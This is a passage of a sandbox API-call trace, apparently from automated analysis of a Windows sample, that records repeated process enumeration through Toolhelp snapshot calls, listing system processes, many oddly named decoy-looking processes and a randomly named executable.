hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.023] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.116] CloseHandle (hObject=0xc4) returned 1 [0134.116] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.122] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0134.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0134.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0134.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.209] Process32NextW (in: hSnapshot=0xbc, 